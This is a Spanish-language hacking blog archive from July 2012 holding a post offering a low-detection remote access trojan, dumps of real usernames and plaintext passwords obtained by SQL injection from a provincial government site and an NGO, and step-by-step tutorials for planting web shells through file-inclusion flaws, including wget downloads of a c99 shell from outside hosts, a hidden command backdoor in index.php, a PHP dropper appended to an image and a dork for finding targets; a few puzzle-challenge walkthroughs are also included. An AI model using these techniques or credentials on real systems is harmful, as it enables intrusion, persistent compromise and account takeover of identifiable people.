julio 2012 ~ HD_Breaker Seguridad Informatica

Ethical Hacking And Exploits Development

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Wargames Challenges and Solutions

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Python App Development

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Java Development Tools

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Android App Development

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

viernes, 27 de julio de 2012

BasicRat by HD_Breaker

Les Traigo una Herramienta Que Arme en estos Dias,
Es un Rat bien Basico, en VB6 no es multithread (no he tenido tiempo de modificarlo),
tampoco tiene incluido el Builder exe,
La Shell no responde a cd ni a comandos q requieran respuesta (luego del comando debera pasarse el comando 1 para obtener la respuesta)
El filemanager no esta incluido, preferi hacerlo funcionar con un servidor tftp (tftp -i "ip/host" GET "Archivo") para luego ejecutarlo desde la shell
(en esta parte se pueden armar varios scripts para obtener informacion sensible guardarla en un log y por medio de tftp PUT obtener el Contenido de estos)
No se Adhiere al Registro (esta funcion la pondre en unos dias cuando termine de Rendir, igual cualquiera de esta seccion sabra agregarle funciones a este proyecto)

El Fin de este RAT era mantener la simpleza para reducir la cantidad de AVs que detectan el Server
Todo Nacio a base de Un Proyecto para la Universidad, a esto le falta mucho desarrollo
pero la meta era realizar algo simple y poderoso con baja deteccion y en lenguaje VB6


Prometo Mejorarlo y Codearlo en Otro Lenguaje.

Adjunto Los Proyectos (Source y Binario)

http://www.filefactory.com/file/5rlj3lf28b63/n/BasicRat.rar

Test.exe esta sobre 127.0.0.1 para prueba local,
Para Hacerlo Funcional fuera del entorno local, cambien el ip por su NO-IP y abran los puertos 9669, 6666 y 9999
C:\Windows\System32 puede variar depende de la pc
pueden usar las variables de entorno para setear eso al momento de escribir los logs. (%SystemDrive%\System32\)

Todo Aquel que desee Modificarlo sientace libre de hacerlo.

Capturas:


Un escaneo Rapido Bajo NoVirusThank

File Info

Report date: 2012-07-27 09:57:10 (GMT 1)
File name: test-exe
File size: 28672 bytes
MD5 Hash: aa55baf750fef5167f0bb79cdc1000c0
SHA1 Hash: b8a248d1105ef47e1edd4872ace31b08da2973f0
Detection rate: 1 on 14 (7%)
Status: INFECTED


Detections

Asquared -
Avast -
AVG -
Avira -
BitDefender - Gen:Trojan.Heur.bm0@fr!oGDJ
ClamAV -
Comodo -
DrWeb -
Fprot -
IkarusT3 -
Panda -
STOPZilla -
TrendMicro -
VBA32 -

Scan Date: 2012-07-27
File Name: Test.exe
File Size: 36864 bytes
MD5 Hash: aa55baf750fef5167f0bb79cdc1000c0
SHA1 Hash: b8a248d1105ef47e1edd4872ace31b08da2973f0
Status: INFECTED
Total Result: 7/37
AVG: Clean
Acavir: Clean
Avast 5: Clean
Avast: Clean
Avira: TR/Dropper.Gen
BitDefender: Clean
VirusBuster Internet Security: Clean
Clam Antivirus: Clean
COMODO Internet Security: Clean
DrWeb: Clean
eTrust-Vet: Win32/VBNA.A!generic
F-PROT Antivirus: Clean
F-Secure Internet Security: Trojan.Generic.KDV.554434
G Data: Trojan.Generic.KDV.554434
IKARUS Security: Clean
Kaspersky Antivirus: Trojan-PSW.Win32.Ruftar.nwc
McAfee: Clean
MS Security Essentials: Clean
ESET NOD32: Clean
Norman: Clean
Norton: Clean
Panda Security: Clean
A-Squared Security: Clean
Quick Heal Antivirus: Clean
Rising Antivirus: Clean
Solo Antivirus: Clean
Sophos: Clean
Trend Micro Internet Security: Clean
VBA32 Antivirus: Clean
Vexira Antivirus: Clean
Webroot Internet Security: Clean
Zoner AntiVirus: Clean
Ad-Aware: Clean
AhnLab V3 Internet Security: Clean
Bullguard: virus: Trojan.Generic.KDV.554434
Imunitet: Trojan.Generic.KDV.554434
Vipre: Clean

jueves, 19 de julio de 2012

Blind SQLI en el Gobierno de Salta, Republica Argentina


SQLI en el Gobierno de Salta, Republica Argentina

http://www.salta.gov.ar/video-salta.php?IdVideo=15


[*] information_schema
[*] salta


| tageestado            
| tagefuncionarios      
| tagenda                
| tbanbanners            
| tcoberturaprensa      
| tconcontenidos        
| tencdetalles          
| tencpreguntas          
| tencrespuestas        
| tgaleriafotos          
| tgaleriafotosdet      
| tgaleriavideos        
| tnotcategorias        
| tnotnoticias          
| tnotpartesprensafiles  
| tnotrelacionadas      
| tnotsubcategoria      
| tnottipoparteprensa    
| tseguserlevelpermissions
| tseguserlevels        
| tsegusuarios          
| tsisimportar          
| ttvvivo                



 sUsuarioNick       sUsuarioNombre             sUsuarioPass

 luciam                  Lucia Mallozzi                Prensa13    
 emilces                 Emilce Simo                    paginaweb13  
 maudiovisuales    Medios Audiovisuales     JB@rbatt!4  
 jbarbatti               Jorge Barbatti                   barbattiprensa
 rtorres                  Prensa - Torres                 Rto556      
 aguaymas            Prensa - Guaymas            aGUA123      
 antoniotita           Antonio Tita                     Ant0-/*      
 asapia                  Prensa - Ana Sapia          sap-20!!    

SQLI en Sociedad Animalista


SQLI en http://www.liberaong.org/cat=1
Sociedad Animalista, Estoy a favor de la Proteccion animal, pero
un sitio de esta naturaleza activista no puede tener este tipo de fallas. Ya Reporte el fallo, espero lo Arreglen

[*] information_schema
[*] liberadba
[*] test


| activistas              
| actualidad          
| admin_accesos    
| admin_actualizaciones
| admin_archivos        
| admin_gruposdecampos  
| admin_imagenes        
| admin_log_sql          
| admin_registrosespeciales
| admin_renombra        
| admin_tablas_config  
| admin_usuarios      
| admin_usuarios_grupos
| admin_usuarios_permisos
| banners                
| campanas            
| campanas_relacionadas
| colores                
| conceptos            
| cyberactivistas      
| denuncias              
| estado_denuncia      
| estado_pedido          
| explotacion          
| fotos                  
| fotos_categoria      
| linea_pedido          
| mail                  
| material              
| material_categoria    
| newsletter            
| newsletter_parrafos  
| notas_relacionadas    
| parrafos              
| pedidos                
| receptores              
| recetas                
| registrados            
| registradosgrupo        
| socios                  
| textos                  
| tienda                  
| tienda_categoria        
| videos                  
| videos_categoria        
| voluntarios            


 Username            Password            Tipo_de_usuario
 admin                  fuey3g                 administrador total      
 leo                       leo333                 administrador de contenidos


martes, 17 de julio de 2012

Subiendo Shell Explotando LFI via php://input




Hola, esta vez les dejare un tutorial, la cual consiste en subir una SHELL explotando la vulnerabilidad LFI via php:input , solo basta con inyectar algunos códigos para obtener la misma.

Que es el LFI? 

Es una falla en la programacion de una aplicacion; falla mediante la cual se pueden incluir archivos que se encuentren en el servidor como por ejemplo el /etc/passwd o algun otro archivo de configuracion que nos provea de informacion para atacar el sitio.


Ahora bien, empecemos...

Algunos de los sitios webs vulnerables a LFI, tienen este aspecto:

www.sitio-web.com/index.php?page=
www.sitio-web.com/index.php?file=

Ahora bien... para comprobar si realmente el sitio web es vulnerable a LFI, tenemos que ver si la web puede leer el "etc/passwd" cosa que el sitio web quedaría de la siguiente forma:

www.sitio-web.com/index.php?page=/etc/passwd 

Si el sitio web puede leer dicho código, la web quedaría asi:


Como vemos en la imagen, ya comprobamos que el sitio web es vulnerable a LFI.

Ahora, haremos el siguiente paso, para subir una shell al servidor.

Necesitaremos lo siguiente:

Navegador: Firefox
Addon: HackBar


Ahora vamos a tratar de poner este método en acción.

Cargamos la url vulnerable al HackBar e inyectamos el php://input la cual quedaría asi:

www.sitio-web.com/index.php?page=php://input

Habilitamos el "Enable Post data" y colocamos el siguiente comando:

<? system('uname -a'); ?>

Ejemplo:


Otros comandos:

Lista de directorios

<? system ('ls'); ?>


Identificación

<? system ('id'); ?>


Convertir el formato

<? system ('mv file.txt file.php'); ?>


Descargar

<? system ('wget'); ?>


Ahora, vamos a utilizar el comando [color=green]<? system ('wget'); ?>[/color] para descargar alguna shell en el sitio.

Utilizaremos esta shell en .txt: http://r57.biz/c99.txt

<? system ('wget http://r57.biz/c99.txt'); ?>



Ahora, comprobaremos si la shell se descargo perfectamente, ejecutando el siguiente comando:

<? system ('ls'); ?>

Si la shell, se descargo perfectamente, en este caso lo veremos como c99.txt


Ahora, como ya sabemos que nuestra shell se ejecuto perfectamente, tenemos que cambiarle el formato a .php para poder ingresar a la misma desde el navegador, solo basta con colocar el siguiente comando:

<? system ('mv c99.txt calebbucker.php'); ?>



Ahora, listamos nuevamente los directorios y apreciaremos nuestra shell en .php


Ahora, en este caso nos dirigimos a www.sitio-web.com/calebbucker.php y Voila tenemos nuestra shell!!


No Entendistes?

Observa el VideoTutorial en 1080p HD!


Espero te sirva y lo uses con prudencia.

Saludos.

Fuente: http://calebbucker.blogspot.com.ar/2012/07/subiendo-shell-explotando-lfi-via.html

WordPress Security Fingerprinter Exploit-DB



Hola, esta vez les dejare una herramienta para encontrar Plugins Vulnerables en los sitios WordPress, es útil para tareas de Pruebas de Penetración y/o para la diversión y beneficio.

La versión actual cuenta con 240 Pruebas de Seguridad.

Esta versión se publico el 18 de Junio del 2012.

Descargamos la herramienta desde el siguiente link: http://www.sendspace.com/file/8md0eh

Descomprimimos, y ejecutamos al herramienta con el siguiente comando:

root@TioSam:~# cd Desktop
root@TioSam:~/Desktop# cd WordPress
root@TioSam:~/Desktop/WordPress# ls
README  WP
root@TioSam:~/Desktop/WordPress# ./WP http://www.noticiasdehackers.com


En este caso yo he colocado, el link http://www.noticiasdehackers.com/ para poner a prueba la herramienta, como se aprecia en la siguiente imagen:



Como podemos apreciar, la herramienta nos arrojo la Version WordPress del sitio web en este caso es 3.3.1 en la cual tambien nos arroja el exploit para dicha versión.

Mas abajo, nos muestra los módulos vulnerables, en la cual nos muestra con sus exploits respectivos.

Si queres ver el funcionamiento de esta herramienta, observa el siguiente vídeo, en la cual podes colocar la resolución en 1080p para que aprecies mejor el vídeo.



Espero le des buen uso y puedas parchear las vulnerabilidades de algun sitio WordPress.

Saludos.

Fuente: http://calebbucker.blogspot.com.ar/2012/07/wordpress-security-fingerprinter.html

Explotar LFI, Subir Shell Explotando /proc/self/environ y Backdorizar


Leyendo el Post de CalebBuker sobre LFI atrasves de php://input
desidi hacer un tutorial de otro metodo para concegir subir una shell por medio de LFI
utilizando injecciones php atraves de una vulnerabilidad en el /proc/self/environ
Empecemos:

Primero Buscamos con un dork alguna web Vulnerable a LFI

Dork:

inurl:*.php?page=* site:.com.ar

Vamos probando hasta encontrar una q al incluir /etc/passwd nos muestra su contenido
En este caso:

http://sitiovulnerable/index.php?page=/etc/passwd



Damos como parametro a incluir /proc/self/environ y vemos el siguien resultado

http://sitiovulnerable/index.php?page=/proc/self/environ



Nos vamos a Mozilla Firefox y abrimos el addon Tamper Data:

Damos clik en Start Tamper y volvemos a realizar la Peticion al sitio web

Atrapa el Primer "paquete" y nos sale el siguiente cartel



Desactivamos la casilla "Continue Tampering" y Damos Click en Tamper, modificamos el Parametro User-Agent intrudiciendo algun Codigo php, de Prueba, Yo intentare con <? System('ls'); ?> para ver si logramos listar el contenido de host.



Damos Click en OK y vemos q el codigo php se ejecuta correctamente y lista los archivos y directorios de la web Vulnerable:



Ahora Sabemos que se puede ejecutar Codigo Shell atraves de php con el comando system,exec,etc (si no funcionace reciviriamos un mensaje diciendo q la funcion system() a sido deshabilitada por razones de seguridad)

Subiremos Nuestra Shell, de la siguiente forma.

Abriremos Tamper Data y comensaremos a Capturar.
Repetiremos la Peticion al host:
http://sitiovulnerable/index.php?page=/proc/self/environ
Modificaremos el Parametro User-Agent para que ejecute Wget y descarge una shell en txt de donde sea que este alojada con el siguiente codigo php

<? system('wget http://SitioDeLaShell/shell.txt'); ?>



Repetimos la Operacion Con Tamper Data y Comprobamos q nuestra shell se subio correctamente pasando como parametro en User-Agent

<? system('ls'); ?>

Vemos que dentro de la lista de archivos del host aparece nuestra shell



Convertiremos Nuestro txt, en un archivo php, repitiendo la operacion con Tamper Data y pasando como Parametro de User-Agent

<? system('mv c99.txt s.php'); ?>

Una ves Hecho Esto repetimos el procedimiento con tamper data para listar nuestros archivos, para ver si el proceso anterior Termino Correctamente:

<? system('ls'); ?>



Como vemos el archivo fue Renombrado Correctamente, solo nos queda vistar nuestro archivo por medio de la URL

http://sitiovulerable/s.php



Como vemos la ejecucion de la shellphp, se ejecuto Correctamente. Como es un Sitio Importante y no queremos q nos detecten, introduciremos un backdoor dentro del codigo de algun archivo, yo elegi index.php



Les Dejo el code del backdoor q arme:

<?php
if($_GET['active']=='si'){
system( $_GET['c']);
}
?>

Lo Introduciremos dentro de index.php y al llamarlo desde

http://SutioVulnerable/index.php?c=ls&active=si

nos mostrara el resultado de la ejecucion del parametro q pasemos.



Solo nos queda Eliminar s.php con el comando rm s.php por medio de nuestro backdoor

http://SutioVulnerable/index.php?c=rm s.php&active=si

Listamos el Contenido del Host

http://SutioVulnerable/index.php?c=ls&active=si

y vemos q s.php ha desaparecido.



Espero que este tutorial les halla servido, HD_Breaker

Renuncia: No me hago Responsable del Uso que le den a este tutorial, su contenido es puramente educativo

Solucionario Reto Vulnerar Servidor (Simulación) by HD_Breaker & Dedalo


Bueno Antes que Nada Queremos Agradecer a Todos Los Participantes, y darles Nuestras Felicitaciones A los 5 Usuarios que Lo Completaron con éxito

Empecemos A Solucionar Este Reto Php para Abrir Camino a los Nuevos ;)

1) Entramos a http://retosphp.host22.com/

y nos encontramos con este Imponente Panel de Administración,




por simple curiosidad Testeamos que sucede al logearnos con un usuario inexistente, probemos

Usuario: Test
Contraseña: Test

Y Sorprendentemente Aparece Exactamente la mima Web con nuestros queridos Campos Borrados,
Con la Diferencia q ahora en la la URL se muestra el nombre de la pagina "index.php"



Se nos Ocurre Mirar el Source de esta Web para ver si encontramos algo de Utilidad

Source:

<html>
<body style="background-image:url(a.jpg); background-attachment: fixed; background-position: top center; background-repeat: no-repeat;">
<form action="log.php" method="post">
<center><h4>Ingrese sus datos</h4><br>
USUARIO:<br>
<input type="text" name="user"><br>
CONTRASE&NtildeA:<br>
<input type="text" name="password"><br>
<input type="submit">
</center>
</form>
</html>
<!-- Hosting24 Analytics Code -->
<script type="text/javascript" src="http://stats.hosting24.com/count.php"></script>
<!-- End Of Analytics Code -->


Y nos encontramos con la siguiente String

<form action="log.php" method="post">

Esto Dice  que Al Clikear sobre nuestro querido boton Submit, los Parámetros Añadidos en el formulario (Usuario/Contraseña)
pasan como variables de un archivo log.php (lo primero q se me viene a la mente es que este formulario funciona
haciendo una petición sql a la base de datos comparando los datos introducidos con los existente en la BD)

Intentemos Bypassearla, probamos con algunos bypasses comunes en ambos campos como por ej.

x' or 1=1

Nuevamente aparece el molesto cartel de login



Probemos Con otro bypass

' OR '1'='1

De nuevo el formulario de logeo



Antes de Darnos por vencidos probamos con

' OR ''='

y POR UN DESCUIDO DEL PROGRAMADOR WEB, INGRESAMOS A LA PARTE PROHIBIDA Muajajajaja (Risa Siniestra XD)



vemos que nos dice las Palabras Mágicas

"Reto LFI encuentra el config.php"

(Todos Pensamos en nuestros adentros, esto ya no es un simple Bypass Ahora esta Web Mal Programada Me Reta a que le encuentre un LFI)

Investiguemos un poco para saber q es un LFI (Local File Inclution)


Que es el lfi? (esta explicacion no es mía es de n0b0dy de undersecurity.net)

Es una falla en la programacion de una aplicacion; falla mediante la cual se pueden incluir archivos que se encuentren en el servidor como por ejemplo el /etc/passwd o algún otro archivo de configuracion que nos provea de información para atacar el sitio.

Esta falla se produce en códigos similares a estos:

(pagina_lfi.php)
<?php
$pagina = $_GET['pagina'];
include($pagina);
?>

Aqui podemos ver que el código siguiente recepcionara mediante el método get (es decir se podrá ver mediante la url la variable a inyectar) también es posible que existan lfi mediante el método post pero eso es un poco mas complicado de encontrar; lo que hace este código es incluir una pagina dentro de otra.


Entonces veremos la url mas menos así:
http://server.cl/pagina_lfi.php?pagina=[archivolocalaincluir]



Deducción en nuestras URL se ve algo como esto

http://retosphp.host22.com/include.php?file=img.jpg

y la expoliación muestra algo así:

http://server.cl/pagina_lfi.php?pagina=[archivolocalaincluir]

Comparemos:

http://server.cl/pagina_lfi.php?pagina=[archivolocalaincluir]
http://retosphp.host22.com/include.php?file=img.jpg

Se parecen no es verdad?, Recordemos que en nuestros intentos de logeo y al revisar el Source encontramos 2 nombres de Archivos Importantes

index.php
log.php

Explotemos el LFI como dice la Expoliación, Quedaría Algo como esto:

http://retosphp.host22.com/include.php?file=index.php

y nuestro Programador Desastroso
(Sin animo de Ofender Dedalo es solo para crear ambiente, mis conocimientos en php son básicos y no quiero faltarte el respeto)
nos informa lo siguiente:

"Vas por buen camino debes encontrar el archivo de configuracion busca en otro archivo"

Interesante, Recordemos el archivo que encontramos en el Source (log.php), Repitamos el ataque, ahora incluyendo a log.php

http://retosphp.host22.com/include.php?file=log.php

Y esta nuevamente nos encontramos con información Sensible

"Vas por buen camino debes encontrar el archivo de configuracion busca en el directorio inc"

Recordemos que el reto Principal es encontrar el contenido de config.php, que según nos dice log.php se encuentra en la carpeta inc,

Esto esta mas q faci no? :)

Incluimos esa carpeta (inc) y el archivo config.php

http://retosphp.host22.com/include.php?file=inc/config.php

y nos encontramos con las Palabras Magicas:

aGRicmVha2VyIHkgRGVkYWxvIG1lIGVuc2XxYW4=
Felicidades!!!

Envia la solucion en un texto plano a los Moderadores de la Seccion

Un momento nos dice, en Texto Plano...
Mmmm esa codificacion me es familiar, creo q es Base64.
Probamos Desencriptarla con Base64 Decrypter

y su contenido es:

hdbreaker y Dedalo me enseñan

Anotamos una descripcion de lo q hicimos junto con la contraseña desencriptada y se la mandamos a los Moderadores

Se da Por Concluido Este Solucionario.

Dedalo & HD_Breaker.

Gracias a todos los Participantes. Se Felicita a:

1° pansinotdead

2° 5TU4RT

3° arthusu

4° k43l

* Sanko

PD: Los Links No Funcionan El host Murio

WebShell Mediante LFI y jpg


En este Tutoria Explicare como meter una phpshell dentro de un servidor por medio de un jpg, para explotarlo mediante un LFI.

Empesemos:

1) Necesitamos 3 cosas una shell.php (con el contenido de nuestra webshell preferida),
una imagen q llame la atencion yo elegi sexy.jpg y un archivo shell.txt con la siguiente String

<? copy("http://tuservidor.com/shell.txt","nombreshell.php"); chmod("nombreshell.php",0755); ?>




Como vemos en la imagen tenemos una foto muy llamativa y un archivo shell.txt con la siguiente string

<? copy("http://tuservidor.com/shell.txt","nombreshell.php"); chmod("nombreshell.php",0755); ?>

yo lo configure de la siguiente manera porq es un entorno local.

<? copy("http://192.168.1.1/shell.txt","shell.php"); chmod("shell.php",0755); ?>

Esta String esta en php, hace lo siguiente:
Copia el contenido de shell.txt situada en nusetro servidor dentro de shell.php
(lo crea dentro de servidor vulnerable) y le asigna permisos 755

Abrimos nuestro Terminal y nos situamos en la Carpeta donde tenemos la foto sexy.jpg y shell.txt
y tipeamos:

cat shell.txt >> sexy.jpg



Todo Termina Correctamente, y si hacemos un Cat a sexy.jpg podemos ver el Source Incluido en ella

cat sexy.jpg



Abrimos sexy.jpg y vemos q la imagen abre sin ningun problema



Ahora nos resta subir sexy.jpg a un servidor Vulnerable a LFI e incluir la Imagen para q se ejecute su contenido php.

(Asumo que ya tiene acceso a AdminPanel y existe un Upload en "X" servidor con una Vulnerabilidad LFI)

http://WebVulnerable/LFI.php?Parametro=sexy.jpg



veran que un monton de caracteres raros aparecen en el navegador (estos son los caracteres Internos del jpg)

luego simplemente Visitamos nuestra shell con la url correspondiente

http://WebVulnerable/shell.php



Espero que este Tutorial Les sea de Utilidad

PD: Este metodo Funciona en Redes Lan y en Redes Wan, No me hago Responsable del uso que le den.

HD_Breaker


Solucionario Reto PQS


A pesar de los Problemas q tubismo Dedalo y yo con PQS y las medidas q se han tomado de el,

Tome este Reto como personal, ya q fue dirigido especialmente a mi y a Dedalo, El Primero en Solucionarlo fue Sanko,

El segundo en solucionarlo fue mi persona y explico acá como hacerlo.

Web del reto: http://pqslabs.netai.net/




lo primero q vemos es un login q si analizamos el source un poco, va a si.php, el cual no existe

después notamos un archivo de fondo q se llama fondo.jpg

nos fijamos q ahí en el con view-source:pqslabs.netai.net/foto.jpg
y en el final de su contenido vemos esto:



al probar con helloaqui.txt en la url, no nos devuelve nada, probamos con fondo.jpg



un curioso fondo verde, analicemos de nuevo con view-source (yo en mi caso use wget para descargar fondo.jpg y luego vi su contenido con cat)



al final de su source vemos:

/acc.php

ingresamos a esa url y vemos lo siguiente:



colocamos las palabras mágicas helloaqui (sin extencion)

y nos devuelve el resultado



Se hizo justicia XD

Algunos sabemos mas q otros pero todos estamos acá para Aprender, las faltas de respeto no se toleran
para mi banear a PQS fue excesivo, mi forma de demostrarle q su postura es errónea es resolviendo su propio juego,

Cosa que el no puedo lograr con el creado por Nosotros (Dedalo & HD_Breaker)

Saludos HD_Breaker